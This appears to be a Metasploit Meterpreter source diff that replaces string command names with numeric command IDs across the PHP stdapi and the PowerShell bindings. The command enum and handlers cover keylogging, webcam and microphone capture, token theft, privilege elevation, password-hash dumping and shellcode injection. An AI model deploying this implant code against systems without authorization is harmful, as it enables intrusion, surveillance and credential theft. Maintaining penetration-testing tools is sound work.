+define('COMMAND_ID_STDAPI_SYS_PROCESS_MEMORY_QUERY', 1082);
+define('COMMAND_ID_STDAPI_SYS_PROCESS_MEMORY_READ', 1083);
+define('COMMAND_ID_STDAPI_SYS_PROCESS_MEMORY_UNLOCK', 1084);
+define('COMMAND_ID_STDAPI_SYS_PROCESS_MEMORY_WRITE', 1085);
+define('COMMAND_ID_STDAPI_SYS_PROCESS_THREAD_CLOSE', 1086);
+define('COMMAND_ID_STDAPI_SYS_PROCESS_THREAD_CREATE', 1087);
+define('COMMAND_ID_STDAPI_SYS_PROCESS_THREAD_GET_THREADS', 1088);
+define('COMMAND_ID_STDAPI_SYS_PROCESS_THREAD_OPEN', 1089);
+define('COMMAND_ID_STDAPI_SYS_PROCESS_THREAD_QUERY_REGS', 1090);
+define('COMMAND_ID_STDAPI_SYS_PROCESS_THREAD_RESUME', 1091);
+define('COMMAND_ID_STDAPI_SYS_PROCESS_THREAD_SET_REGS', 1092);
+define('COMMAND_ID_STDAPI_SYS_PROCESS_THREAD_SUSPEND', 1093);
+define('COMMAND_ID_STDAPI_SYS_PROCESS_THREAD_TERMINATE', 1094);
+define('COMMAND_ID_STDAPI_SYS_PROCESS_WAIT', 1095);
+define('COMMAND_ID_STDAPI_UI_DESKTOP_ENUM', 1096);
+define('COMMAND_ID_STDAPI_UI_DESKTOP_GET', 1097);
+define('COMMAND_ID_STDAPI_UI_DESKTOP_SCREENSHOT', 1098);
+define('COMMAND_ID_STDAPI_UI_DESKTOP_SET', 1099);
+define('COMMAND_ID_STDAPI_UI_ENABLE_KEYBOARD', 1100);
+define('COMMAND_ID_STDAPI_UI_ENABLE_MOUSE', 1101);
+define('COMMAND_ID_STDAPI_UI_GET_IDLE_TIME', 1102);
+define('COMMAND_ID_STDAPI_UI_GET_KEYS_UTF8', 1103);
+define('COMMAND_ID_STDAPI_UI_SEND_KEYEVENT', 1104);
+define('COMMAND_ID_STDAPI_UI_SEND_KEYS', 1105);
+define('COMMAND_ID_STDAPI_UI_SEND_MOUSE', 1106);
+define('COMMAND_ID_STDAPI_UI_START_KEYSCAN', 1107);
+define('COMMAND_ID_STDAPI_UI_STOP_KEYSCAN', 1108);
+define('COMMAND_ID_STDAPI_UI_UNLOCK_DESKTOP', 1109);
+define('COMMAND_ID_STDAPI_WEBCAM_AUDIO_RECORD', 1110);
+define('COMMAND_ID_STDAPI_WEBCAM_GET_FRAME', 1111);
+define('COMMAND_ID_STDAPI_WEBCAM_LIST', 1112);
+define('COMMAND_ID_STDAPI_WEBCAM_START', 1113);
+define('COMMAND_ID_STDAPI_WEBCAM_STOP', 1114);
+define('COMMAND_ID_STDAPI_AUDIO_MIC_START', 1115);
+define('COMMAND_ID_STDAPI_AUDIO_MIC_STOP', 1116);
+define('COMMAND_ID_STDAPI_AUDIO_MIC_LIST', 1117);
+# ---------------------------------------------------------------
+
+
 ##
 # Errors
 ##
@@ -319,7 +443,7 @@ function add_stat_buf($path) {
 # traditionally used this to get environment variables from the server.
 #
 if (!function_exists('stdapi_fs_file_expand_path')) {
-register_command('stdapi_fs_file_expand_path');
+register_command('stdapi_fs_file_expand_path', COMMAND_ID_STDAPI_FS_FILE_EXPAND_PATH);
 function stdapi_fs_file_expand_path($req, &$pkt) {
     my_print("doing expand_path");
     $path_tlv = packet_get_tlv($req, TLV_TYPE_FILE_PATH);
@@ -358,7 +482,7 @@ function stdapi_fs_file_expand_path($req, &$pkt) {
 }
 
 if (!function_exists('stdapi_fs_delete_dir')) {
-register_command('stdapi_fs_delete_dir');
+register_command('stdapi_fs_delete_dir', COMMAND_ID_STDAPI_FS_DELETE_DIR);
 function stdapi_fs_delete_dir($req, &$pkt) {
     my_print("doing rmdir");
     $path_tlv = packet_get_tlv($req, TLV_TYPE_DIRECTORY_PATH);
@@ -368,7 +492,7 @@ function stdapi_fs_delete_dir($req, &$pkt) {
 }
 
 if (!function_exists('stdapi_fs_mkdir')) {
-register_command('stdapi_fs_mkdir');
+register_command('stdapi_fs_mkdir', COMMAND_ID_STDAPI_FS_MKDIR);
 function stdapi_fs_mkdir($req, &$pkt) {
     my_print("doing mkdir");
     $path_tlv = packet_get_tlv($req, TLV_TYPE_DIRECTORY_PATH);
@@ -379,7 +503,7 @@ function stdapi_fs_mkdir($req, &$pkt) {
 
 # works
 if (!function_exists('stdapi_fs_chdir')) {
-register_command('stdapi_fs_chdir');
+register_command('stdapi_fs_chdir', COMMAND_ID_STDAPI_FS_CHDIR);
 function stdapi_fs_chdir($req, &$pkt) {
     my_print("doing chdir");
     $path_tlv = packet_get_tlv($req, TLV_TYPE_DIRECTORY_PATH);
@@ -388,24 +512,9 @@ function stdapi_fs_chdir($req, &$pkt) {
 }
 }
 
-# works
-if (!function_exists('stdapi_fs_delete')) {
-register_command('stdapi_fs_delete');
-function stdapi_fs_delete($req, &$pkt) {
-    my_print("doing delete");
-    $path_tlv = packet_get_tlv($req, TLV_TYPE_FILE_NAME);
-    $path = canonicalize_path($path_tlv['value']);
-    if (is_windows()) {
-        exec("attrib.exe -r ".$path);
-    }
-    $ret = @unlink($path);
-    return $ret ? ERROR_SUCCESS : ERROR_FAILURE;
-}
-}
-
 # works
 if (!function_exists('stdapi_fs_file_move')) {
-register_command('stdapi_fs_file_move');
+register_command('stdapi_fs_file_move', COMMAND_ID_STDAPI_FS_FILE_MOVE);
 function stdapi_fs_file_move($req, &$pkt) {
     my_print("doing mv");
     $old_file_tlv = packet_get_tlv($req, TLV_TYPE_FILE_NAME);
@@ -419,7 +528,7 @@ function stdapi_fs_file_move($req, &$pkt) {
 
 # works
 if (!function_exists('stdapi_fs_file_copy')) {
-register_command('stdapi_fs_file_copy');
+register_command('stdapi_fs_file_copy', COMMAND_ID_STDAPI_FS_FILE_COPY);
 function stdapi_fs_file_copy($req, &$pkt) {
     my_print("doing cp");
     $old_file_tlv = packet_get_tlv($req, TLV_TYPE_FILE_NAME);
@@ -433,7 +542,7 @@ function stdapi_fs_file_copy($req, &$pkt) {
 
 # works on Unix systems but probably not on Windows
 if (!function_exists('stdapi_fs_chmod') && !is_windows()) {
-register_command('stdapi_fs_chmod');
+register_command('stdapi_fs_chmod', COMMAND_ID_STDAPI_FS_CHMOD);
 function stdapi_fs_chmod($req, &$pkt) {
     my_print("doing chmod");
     $path_tlv = packet_get_tlv($req, TLV_TYPE_FILE_PATH);
@@ -447,7 +556,7 @@ function stdapi_fs_chmod($req, &$pkt) {
 
 # works
 if (!function_exists('stdapi_fs_getwd')) {
-register_command('stdapi_fs_getwd');
+register_command('stdapi_fs_getwd', COMMAND_ID_STDAPI_FS_GETWD);
 function stdapi_fs_getwd($req, &$pkt) {
     my_print("doing pwd");
     packet_add_tlv($pkt, create_tlv(TLV_TYPE_DIRECTORY_PATH, getcwd()));
@@ -458,7 +567,7 @@ function stdapi_fs_getwd($req, &$pkt) {
 # works partially, need to get the path argument to mean the same thing as in
 # windows
 if (!function_exists('stdapi_fs_ls')) {
-register_command('stdapi_fs_ls');
+register_command('stdapi_fs_ls', COMMAND_ID_STDAPI_FS_LS);
 function stdapi_fs_ls($req, &$pkt) {
     my_print("doing ls");
     $path_tlv = packet_get_tlv($req, TLV_TYPE_DIRECTORY_PATH);
@@ -485,7 +594,7 @@ function stdapi_fs_ls($req, &$pkt) {
 }
 
 if (!function_exists('stdapi_fs_separator')) {
-register_command('stdapi_fs_separator');
+register_command('stdapi_fs_separator', COMMAND_ID_STDAPI_FS_SEPARATOR);
 function stdapi_fs_separator($req, &$pkt) {
     packet_add_tlv($pkt, create_tlv(TLV_TYPE_STRING, DIRECTORY_SEPARATOR));
     return ERROR_SUCCESS;
@@ -493,7 +602,7 @@ function stdapi_fs_separator($req, &$pkt) {
 }
 
 if (!function_exists('stdapi_fs_stat')) {
-register_command('stdapi_fs_stat');
+register_command('stdapi_fs_stat', COMMAND_ID_STDAPI_FS_STAT);
 function stdapi_fs_stat($req, &$pkt) {
     my_print("doing stat");
     $path_tlv = packet_get_tlv($req, TLV_TYPE_FILE_PATH);
@@ -510,7 +619,7 @@ function stdapi_fs_stat($req, &$pkt) {
 
 # works
 if (!function_exists('stdapi_fs_delete_file')) {
-register_command('stdapi_fs_delete_file');
+register_command('stdapi_fs_delete_file', COMMAND_ID_STDAPI_FS_DELETE_FILE);
 function stdapi_fs_delete_file($req, &$pkt) {
     my_print("doing delete");
     $path_tlv = packet_get_tlv($req, TLV_TYPE_FILE_PATH);
@@ -526,7 +635,7 @@ function stdapi_fs_delete_file($req, &$pkt) {
 }
 
 if (!function_exists('stdapi_fs_search')) {
-register_command('stdapi_fs_search');
+register_command('stdapi_fs_search', COMMAND_ID_STDAPI_FS_SEARCH);
 function stdapi_fs_search($req, &$pkt) {
     my_print("doing search");
 
@@ -566,7 +675,7 @@ function stdapi_fs_search($req, &$pkt) {
 
 
 if (!function_exists('stdapi_fs_md5')) {
-register_command("stdapi_fs_md5");
+register_command("stdapi_fs_md5", COMMAND_ID_STDAPI_FS_MD5);
 function stdapi_fs_md5($req, &$pkt) {
     $path_tlv = packet_get_tlv($req, TLV_TYPE_FILE_PATH);
     $path = canonicalize_path($path_tlv['value']);
@@ -584,7 +693,7 @@ function stdapi_fs_md5($req, &$pkt) {
 
 
 if (!function_exists('stdapi_fs_sha1')) {
-register_command("stdapi_fs_sha1");
+register_command("stdapi_fs_sha1", COMMAND_ID_STDAPI_FS_SHA1);
 function stdapi_fs_sha1($req, &$pkt) {
     $path_tlv = packet_get_tlv($req, TLV_TYPE_FILE_PATH);
     $path = canonicalize_path($path_tlv['value']);
@@ -605,9 +714,8 @@ function stdapi_fs_sha1($req, &$pkt) {
 
 # works
 if (!function_exists('stdapi_sys_config_getuid')) {
-register_command('stdapi_sys_config_getuid');
+register_command('stdapi_sys_config_getuid', COMMAND_ID_STDAPI_SYS_CONFIG_GETUID);
 function stdapi_sys_config_getuid($req, &$pkt) {
-    my_print("doing getuid");
     if (is_callable('posix_getuid')) {
         $uid = posix_getuid();
         $pwinfo = posix_getpwuid($uid);
@@ -618,13 +726,14 @@ function stdapi_sys_config_getuid($req, &$pkt) {
         # instead.
         $user = get_current_user() . " (" . getmyuid() . ")";
     }
+    my_print("getuid - returning: " . $user);
     packet_add_tlv($pkt, create_tlv(TLV_TYPE_USER_NAME, $user));
     return ERROR_SUCCESS;
 }
 }
 
 if (!function_exists('stdapi_sys_config_getenv')) {
-register_command('stdapi_sys_config_getenv');
+register_command('stdapi_sys_config_getenv', COMMAND_ID_STDAPI_SYS_CONFIG_GETENV);
 function stdapi_sys_config_getenv($req, &$pkt) {
     my_print("doing getenv");
 
@@ -658,18 +767,9 @@ function stdapi_sys_config_getenv($req, &$pkt) {
 }
 
 
-# Unimplemented becuase it's unimplementable
-#if (!function_exists('stdapi_sys_config_rev2self')) {
-#register_command('stdapi_sys_config_rev2self');
-#function stdapi_sys_config_rev2self($req, &$pkt) {
-#    my_print("doing rev2self");
-#    return ERROR_FAILURE;
-#}
-#}
-
 # works
 if (!function_exists('stdapi_sys_config_sysinfo')) {
-register_command('stdapi_sys_config_sysinfo');
+register_command('stdapi_sys_config_sysinfo', COMMAND_ID_STDAPI_SYS_CONFIG_SYSINFO);
 function stdapi_sys_config_sysinfo($req, &$pkt) {
     my_print("doing sysinfo");
     packet_add_tlv($pkt, create_tlv(TLV_TYPE_COMPUTER_NAME, php_uname("n")));
@@ -679,7 +779,7 @@ function stdapi_sys_config_sysinfo($req, &$pkt) {
 }
 
 if (!function_exists('stdapi_sys_config_localtime')) {
-register_command('stdapi_sys_config_localtime');
+register_command('stdapi_sys_config_localtime', COMMAND_ID_STDAPI_SYS_CONFIG_LOCALTIME);
 function stdapi_sys_config_localtime($req, &$pkt) {
     my_print("doing localtime");
     packet_add_tlv($pkt, create_tlv(TLV_TYPE_LOCAL_DATETIME, strftime("%Y-%m-%d %H:%M:%S %Z (UTC%z)")));
@@ -691,7 +791,7 @@ function stdapi_sys_config_localtime($req, &$pkt) {
 $GLOBALS['processes'] = array();
 
 if (!function_exists('stdapi_sys_process_execute')) {
-register_command('stdapi_sys_process_execute');
+register_command('stdapi_sys_process_execute', COMMAND_ID_STDAPI_SYS_PROCESS_EXECUTE);
 function stdapi_sys_process_execute($req, &$pkt) {
     global $channel_process_map, $processes;
 
@@ -766,7 +866,7 @@ function stdapi_sys_process_execute($req, &$pkt) {
 
 
 if (!function_exists('stdapi_sys_process_close')) {
-register_command('stdapi_sys_process_close');
+register_command('stdapi_sys_process_close', COMMAND_ID_STDAPI_SYS_PROCESS_CLOSE);
 function stdapi_sys_process_close($req, &$pkt) {
     global $processes;
     my_print("doing process_close");
@@ -820,7 +920,7 @@ function close_process($proc) {
 # to decide what options to send to ps for portability and for information
 # usefulness.
 if (!function_exists('stdapi_sys_process_get_processes')) {
-register_command('stdapi_sys_process_get_processes');
+register_command('stdapi_sys_process_get_processes', COMMAND_ID_STDAPI_SYS_PROCESS_GET_PROCESSES);
 function stdapi_sys_process_get_processes($req, &$pkt) {
     my_print("doing get_processes");
     $list = array();
@@ -870,7 +970,7 @@ function stdapi_sys_process_get_processes($req, &$pkt) {
 
 # works
 if (!function_exists('stdapi_sys_process_getpid')) {
-register_command('stdapi_sys_process_getpid');
+register_command('stdapi_sys_process_getpid', COMMAND_ID_STDAPI_SYS_PROCESS_GETPID);
 function stdapi_sys_process_getpid($req, &$pkt) {
     my_print("doing getpid");
     packet_add_tlv($pkt, create_tlv(TLV_TYPE_PID, getmypid()));
@@ -879,7 +979,7 @@ function stdapi_sys_process_getpid($req, &$pkt) {
 }
 
 if (!function_exists('stdapi_sys_process_kill')) {
-register_command('stdapi_sys_process_kill');
+register_command('stdapi_sys_process_kill', COMMAND_ID_STDAPI_SYS_PROCESS_KILL);
 function stdapi_sys_process_kill($req, &$pkt) {
     # The existence of posix_kill is unlikely (it's a php compile-time option
     # that isn't enabled by default, but better to try it and avoid shelling
@@ -910,7 +1010,7 @@ function stdapi_sys_process_kill($req, &$pkt) {
 }
 
 if (!function_exists('stdapi_net_socket_tcp_shutdown')) {
-register_command('stdapi_net_socket_tcp_shutdown');
+register_command('stdapi_net_socket_tcp_shutdown', COMMAND_ID_STDAPI_NET_SOCKET_TCP_SHUTDOWN);
 function stdapi_net_socket_tcp_shutdown($req, &$pkt) {
     my_print("doing stdapi_net_socket_tcp_shutdown");
     $cid_tlv = packet_get_tlv($req, TLV_TYPE_CHANNEL_ID);
@@ -952,7 +1052,7 @@ function deregister_registry_key($id) {
 
 if (!function_exists('stdapi_registry_create_key')) {
 if (is_windows() and is_callable('reg_open_key')) {
-  register_command('stdapi_registry_create_key');
+  register_command('stdapi_registry_create_key', COMMAND_ID_STDAPI_REGISTRY_CREATE_KEY);
 }
 function stdapi_registry_create_key($req, &$pkt) {
     my_print("doing stdapi_registry_create_key");
@@ -988,7 +1088,7 @@ function stdapi_registry_create_key($req, &$pkt) {
 
 if (!function_exists('stdapi_registry_close_key')) {
 if (is_windows() and is_callable('reg_open_key')) {
-    register_command('stdapi_registry_close_key');
+    register_command('stdapi_registry_close_key', COMMAND_ID_STDAPI_REGISTRY_CLOSE_KEY);
 }
 function stdapi_registry_close_key($req, &$pkt) {
     if (is_windows() and is_callable('reg_open_key')) {
@@ -1009,7 +1109,7 @@ function stdapi_registry_close_key($req, &$pkt) {
 
 if (!function_exists('stdapi_registry_query_value')) {
 if (is_windows() and is_callable('reg_open_key')) {
-  register_command('stdapi_registry_query_value');
+  register_command('stdapi_registry_query_value', COMMAND_ID_STDAPI_REGISTRY_QUERY_VALUE);
 }
 function stdapi_registry_query_value($req, &$pkt) {
     if (is_windows() and is_callable('reg_open_key')) {

powershell/MSF.Powershell/MSF.Powershell.csproj

@@ -39,6 +39,7 @@
     </Reference>
   </ItemGroup>
   <ItemGroup>
+    <Compile Include="Meterpreter\CommandId.cs" />
     <Compile Include="Meterpreter\Elevate.cs" />
     <Compile Include="Meterpreter\Enumerations.cs" />
     <Compile Include="Meterpreter\Core.cs" />

powershell/MSF.Powershell/MSF.PowershellTester/Program.cs

@@ -19,8 +19,9 @@ namespace MSF.PowershellTester
             t.Pack(TlvType.ElevateTechnique, 1);
             t.Pack(TlvType.ElevateServiceName, "abcd1234");
 
-            var x = t.ToRequest("priv_elevate_getsystem");
+            var x = t.ToRequest(CommandId.PrivElevateGetsystem);
             var y = 0;
+            y++;
         }
     }
 }

powershell/MSF.Powershell/Meterpreter/CommandId.cs

@@ -0,0 +1,236 @@
+/// <summary>
+// This content was generated by a tool @ 2020-05-01 05:39:38 UTC
+/// </summary>
+namespace MSF.Powershell.Meterpreter
+{
+    public enum ExtensionId
+    {
+        Core = 0,
+        Stdapi = 1000,
+        Priv = 2000,
+        Extapi = 3000,
+        Sniffer = 4000,
+        Winpmem = 7000,
+        Kiwi = 8000,
+        Unhook = 10000,
+        Espia = 11000,
+        Incognito = 12000,
+        Python = 13000,
+        Powershell = 14000,
+        Lanattacks = 15000,
+        Peinjector = 16000,
+        Mimikatz = 17000,
+    }
+
+    public enum CommandId
+    {
+        CoreChannelClose = 1,
+        CoreChannelEof = 2,
+        CoreChannelInteract = 3,
+        CoreChannelOpen = 4,
+        CoreChannelRead = 5,
+        CoreChannelSeek = 6,
+        CoreChannelTell = 7,
+        CoreChannelWrite = 8,
+        CoreConsoleWrite = 9,
+        CoreEnumextcmd = 10,
+        CoreGetSessionGuid = 11,
+        CoreLoadlib = 12,
+        CoreMachineId = 13,
+        CoreMigrate = 14,
+        CoreNativeArch = 15,
+        CoreNegotiateTlvEncryption = 16,
+        CorePatchUrl = 17,
+        CorePivotAdd = 18,
+        CorePivotRemove = 19,
+        CorePivotSessionDied = 20,
+        CoreSetSessionGuid = 21,
+        CoreSetUuid = 22,
+        CoreShutdown = 23,
+        CoreTransportAdd = 24,
+        CoreTransportChange = 25,
+        CoreTransportGetcerthash = 26,
+        CoreTransportList = 27,
+        CoreTransportNext = 28,
+        CoreTransportPrev = 29,
+        CoreTransportRemove = 30,
+        CoreTransportSetcerthash = 31,
+        CoreTransportSetTimeouts = 32,
+        CoreTransportSleep = 33,
+        StdapiFsChdir = 1001,
+        StdapiFsChmod = 1002,
+        StdapiFsDeleteDir = 1003,
+        StdapiFsDeleteFile = 1004,
+        StdapiFsFileCopy = 1005,
+        StdapiFsFileExpandPath = 1006,
+        StdapiFsFileMove = 1007,
+        StdapiFsGetwd = 1008,
+        StdapiFsLs = 1009,
+        StdapiFsMd5 = 1010,
+        StdapiFsMkdir = 1011,
+        StdapiFsMountShow = 1012,
+        StdapiFsSearch = 1013,
+        StdapiFsSeparator = 1014,
+        StdapiFsSha1 = 1015,
+        StdapiFsStat = 1016,
+        StdapiNetConfigAddRoute = 1017,
+        StdapiNetConfigGetArpTable = 1018,
+        StdapiNetConfigGetInterfaces = 1019,
+        StdapiNetConfigGetNetstat = 1020,
+        StdapiNetConfigGetProxy = 1021,
+        StdapiNetConfigGetRoutes = 1022,
+        StdapiNetConfigRemoveRoute = 1023,
+        StdapiNetResolveHost = 1024,
+        StdapiNetResolveHosts = 1025,
+        StdapiNetSocketTcpShutdown = 1026,
+        StdapiNetTcpChannelOpen = 1027,
+        StdapiRailgunApi = 1028,
+        StdapiRailgunApiMulti = 1029,
+        StdapiRailgunMemread = 1030,
+        StdapiRailgunMemwrite = 1031,
+        StdapiRegistryCheckKeyExists = 1032,
+        StdapiRegistryCloseKey = 1033,
+        StdapiRegistryCreateKey = 1034,
+        StdapiRegistryDeleteKey = 1035,
+        StdapiRegistryDeleteValue = 1036,
+        StdapiRegistryEnumKey = 1037,
+        StdapiRegistryEnumKeyDirect = 1038,
+        StdapiRegistryEnumValue = 1039,
+        StdapiRegistryEnumValueDirect = 1040,
+        StdapiRegistryLoadKey = 1041,
+        StdapiRegistryOpenKey = 1042,
+        StdapiRegistryOpenRemoteKey = 1043,
+        StdapiRegistryQueryClass = 1044,
+        StdapiRegistryQueryValue = 1045,
+        StdapiRegistryQueryValueDirect = 1046,
+        StdapiRegistrySetValue = 1047,
+        StdapiRegistrySetValueDirect = 1048,
+        StdapiRegistryUnloadKey = 1049,
+        StdapiSysConfigDriverList = 1050,
+        StdapiSysConfigDropToken = 1051,
+        StdapiSysConfigGetenv = 1052,
+        StdapiSysConfigGetprivs = 1053,
+        StdapiSysConfigGetsid = 1054,
+        StdapiSysConfigGetuid = 1055,
+        StdapiSysConfigLocaltime = 1056,
+        StdapiSysConfigRev2self = 1057,
+        StdapiSysConfigStealToken = 1058,
+        StdapiSysConfigSysinfo = 1059,
+        StdapiSysEventlogClear = 1060,
+        StdapiSysEventlogClose = 1061,
+        StdapiSysEventlogNumrecords = 1062,
+        StdapiSysEventlogOldest = 1063,
+        StdapiSysEventlogOpen = 1064,
+        StdapiSysEventlogRead = 1065,
+        StdapiSysPowerExitwindows = 1066,
+        StdapiSysProcessAttach = 1067,
+        StdapiSysProcessClose = 1068,
+        StdapiSysProcessExecute = 1069,
+        StdapiSysProcessGetInfo = 1070,
+        StdapiSysProcessGetProcesses = 1071,
+        StdapiSysProcessGetpid = 1072,
+        StdapiSysProcessImageGetImages = 1073,
+        StdapiSysProcessImageGetProcAddress = 1074,
+        StdapiSysProcessImageLoad = 1075,
+        StdapiSysProcessImageUnload = 1076,
+        StdapiSysProcessKill = 1077,
+        StdapiSysProcessMemoryAllocate = 1078,
+        StdapiSysProcessMemoryFree = 1079,
+        StdapiSysProcessMemoryLock = 1080,
+        StdapiSysProcessMemoryProtect = 1081,
+        StdapiSysProcessMemoryQuery = 1082,
+        StdapiSysProcessMemoryRead = 1083,
+        StdapiSysProcessMemoryUnlock = 1084,
+        StdapiSysProcessMemoryWrite = 1085,
+        StdapiSysProcessThreadClose = 1086,
+        StdapiSysProcessThreadCreate = 1087,
+        StdapiSysProcessThreadGetThreads = 1088,
+        StdapiSysProcessThreadOpen = 1089,
+        StdapiSysProcessThreadQueryRegs = 1090,
+        StdapiSysProcessThreadResume = 1091,
+        StdapiSysProcessThreadSetRegs = 1092,
+        StdapiSysProcessThreadSuspend = 1093,
+        StdapiSysProcessThreadTerminate = 1094,
+        StdapiSysProcessWait = 1095,
+        StdapiUiDesktopEnum = 1096,
+        StdapiUiDesktopGet = 1097,
+        StdapiUiDesktopScreenshot = 1098,
+        StdapiUiDesktopSet = 1099,
+        StdapiUiEnableKeyboard = 1100,
+        StdapiUiEnableMouse = 1101,
+        StdapiUiGetIdleTime = 1102,
+        StdapiUiGetKeysUtf8 = 1103,
+        StdapiUiSendKeyevent = 1104,
+        StdapiUiSendKeys = 1105,
+        StdapiUiSendMouse = 1106,
+        StdapiUiStartKeyscan = 1107,
+        StdapiUiStopKeyscan = 1108,
+        StdapiUiUnlockDesktop = 1109,
+        StdapiWebcamAudioRecord = 1110,
+        StdapiWebcamGetFrame = 1111,
+        StdapiWebcamList = 1112,
+        StdapiWebcamStart = 1113,
+        StdapiWebcamStop = 1114,
+        StdapiAudioMicStart = 1115,
+        StdapiAudioMicStop = 1116,
+        StdapiAudioMicList = 1117,
+        PrivElevateGetsystem = 2001,
+        PrivFsBlankDirectoryMace = 2002,
+        PrivFsBlankFileMace = 2003,
+        PrivFsGetFileMace = 2004,
+        PrivFsSetFileMace = 2005,
+        PrivFsSetFileMaceFromFile = 2006,
+        PrivPasswdGetSamHashes = 2007,
+        ExtapiAdsiDomainQuery = 3001,
+        ExtapiClipboardGetData = 3002,
+        ExtapiClipboardMonitorDump = 3003,
+        ExtapiClipboardMonitorPause = 3004,
+        ExtapiClipboardMonitorPurge = 3005,
+        ExtapiClipboardMonitorResume = 3006,
+        ExtapiClipboardMonitorStart = 3007,
+        ExtapiClipboardMonitorStop = 3008,
+        ExtapiClipboardSetData = 3009,
+        ExtapiNtdsParse = 3010,
+        ExtapiPageantSendQuery = 3011,
+        ExtapiServiceControl = 3012,
+        ExtapiServiceEnum = 3013,
+        ExtapiServiceQuery = 3014,
+        ExtapiWindowEnum = 3015,
+        ExtapiWmiQuery = 3016,
+        SnifferCaptureDump = 4001,
+        SnifferCaptureDumpRead = 4002,
+        SnifferCaptureRelease = 4003,
+        SnifferCaptureStart = 4004,
+        SnifferCaptureStats = 4005,
+        SnifferCaptureStop = 4006,
+        SnifferInterfaces = 4007,
+        WinpmemDumpRam = 7001,
+        KiwiExecCmd = 8001,
+        UnhookPe = 10001,
+        EspiaImageGetDevScreen = 11001,
+        IncognitoAddGroupUser = 12001,
+        IncognitoAddLocalgroupUser = 12002,
+        IncognitoAddUser = 12003,
+        IncognitoImpersonateToken = 12004,
+        IncognitoListTokens = 12005,
+        IncognitoSnarfHashes = 12006,
+        PythonExecute = 13001,
+        PythonReset = 13002,
+        PowershellAssemblyLoad = 14001,
+        PowershellExecute = 14002,
+        PowershellSessionRemove = 14003,
+        PowershellShell = 14004,
+        LanattacksAddTftpFile = 15001,
+        LanattacksDhcpLog = 15002,
+        LanattacksResetDhcp = 15003,
+        LanattacksResetTftp = 15004,
+        LanattacksSetDhcpOption = 15005,
+        LanattacksStartDhcp = 15006,
+        LanattacksStartTftp = 15007,
+        LanattacksStopDhcp = 15008,
+        LanattacksStopTftp = 15009,
+        PeinjectorInjectShellcode = 16001,
+        MimikatzCustomCommand = 17001,
+    }
+}
+

powershell/MSF.Powershell/Meterpreter/Elevate.cs

@@ -14,7 +14,7 @@ namespace MSF.Powershell.Meterpreter
             tlv.Pack(TlvType.ElevateTechnique, 1);
             tlv.Pack(TlvType.ElevateServiceName, "abcd1234");
 
-            var result = Core.InvokeMeterpreterBinding(true, tlv.ToRequest("priv_elevate_getsystem"));
+            var result = Core.InvokeMeterpreterBinding(true, tlv.ToRequest(CommandId.PrivElevateGetsystem));
 
             if (result != null)
             {
@@ -32,7 +32,7 @@ namespace MSF.Powershell.Meterpreter
 
             Tlv tlv = new Tlv();
 
-            var result = Core.InvokeMeterpreterBinding(true, tlv.ToRequest("stdapi_sys_config_rev2self"));
+            var result = Core.InvokeMeterpreterBinding(true, tlv.ToRequest(CommandId.StdapiSysConfigRev2self));
 
             if (result != null)
             {
@@ -51,7 +51,7 @@ namespace MSF.Powershell.Meterpreter
             Tlv tlv = new Tlv();
             tlv.Pack(TlvType.Pid, pid);
 
-            var result = Core.InvokeMeterpreterBinding(true, tlv.ToRequest("stdapi_sys_config_steal_token"));
+            var result = Core.InvokeMeterpreterBinding(true, tlv.ToRequest(CommandId.StdapiSysConfigStealToken));
 
             if (result != null)
             {
@@ -69,7 +69,7 @@ namespace MSF.Powershell.Meterpreter
 
             Tlv tlv = new Tlv();
 
-            var result = Core.InvokeMeterpreterBinding(true, tlv.ToRequest("stdapi_sys_config_drop_token"));
+            var result = Core.InvokeMeterpreterBinding(true, tlv.ToRequest(CommandId.StdapiSysConfigDropToken));
 
             if (result != null)
             {

powershell/MSF.Powershell/Meterpreter/Enumerations.cs

@@ -39,7 +39,7 @@ namespace MSF.Powershell.Meterpreter
     {
         // Actual types
         Any = MetaType.None,
-        Method = MetaType.String | 1,
+        CommandId = MetaType.Uint | 1,
         RequestId = MetaType.String | 2,
         Exception = MetaType.Group | 3,
         Result = MetaType.Uint | 4,

powershell/MSF.Powershell/Meterpreter/FileSystem.cs

@@ -30,7 +30,7 @@ namespace MSF.Powershell.Meterpreter
         {
             Tlv tlv = new Tlv();
 
-            var result = Core.InvokeMeterpreterBinding(true, tlv.ToRequest("stdapi_fs_mount_show"));
+            var result = Core.InvokeMeterpreterBinding(true, tlv.ToRequest(CommandId.StdapiFsMountShow));
 
             if (result != null)
             {

powershell/MSF.Powershell/Meterpreter/Incognito.cs

@@ -48,7 +48,7 @@ namespace MSF.Powershell.Meterpreter
             tlv.Pack(TlvType.IncognitoUserName, username);
             tlv.Pack(TlvType.IncognitoPassword, password);
 
-            var result = Core.InvokeMeterpreterBinding(true, tlv.ToRequest("incognito_add_user"));
+            var result = Core.InvokeMeterpreterBinding(true, tlv.ToRequest(CommandId.IncognitoAddUser));
 
             if (result != null)
             {
@@ -69,15 +69,15 @@ namespace MSF.Powershell.Meterpreter
 
         public static bool AddGroupUser(string server, string group, string username)
         {
-            return AddGroupUserInternal("incognito_add_group_user", server, group, username);
+            return AddGroupUserInternal(CommandId.IncognitoAddGroupUser, server, group, username);
         }
         
         public static bool AddLocalGroupUser(string server, string group, string username)
         {
-            return AddGroupUserInternal("incognito_add_localgroup_user", server, group, username);
+            return AddGroupUserInternal(CommandId.IncognitoAddLocalgroupUser, server, group, username);
         }
         
-        private static bool AddGroupUserInternal(string msg, string server, string group, string username)
+        private static bool AddGroupUserInternal(CommandId commandId, string server, string group, string username)
         {
             System.Diagnostics.Debug.Write("[PSH BINDING] Invoking binding call AddGroupUserInternal");
 
@@ -86,7 +86,7 @@ namespace MSF.Powershell.Meterpreter
             tlv.Pack(TlvType.IncognitoGroupName, group);
             tlv.Pack(TlvType.IncognitoUserName, username);
 
-            var result = Core.InvokeMeterpreterBinding(true, tlv.ToRequest(msg));
+            var result = Core.InvokeMeterpreterBinding(true, tlv.ToRequest(commandId));
 
             if (result != null)
             {
@@ -111,7 +111,7 @@ namespace MSF.Powershell.Meterpreter
 
             Tlv tlv = new Tlv();
 
-            var result = Core.InvokeMeterpreterBinding(true, tlv.ToRequest("incognito_snarf_hashes"));
+            var result = Core.InvokeMeterpreterBinding(true, tlv.ToRequest(CommandId.IncognitoSnarfHashes));
 
             if (result != null)
             {
@@ -137,7 +137,7 @@ namespace MSF.Powershell.Meterpreter
             Tlv tlv = new Tlv();
             tlv.Pack(TlvType.IncognitoImpersonateToken, user);
 
-            var result = Core.InvokeMeterpreterBinding(true, tlv.ToRequest("incognito_impersonate_token"));
+            var result = Core.InvokeMeterpreterBinding(true, tlv.ToRequest(CommandId.IncognitoImpersonateToken));
 
             if (result != null)
             {
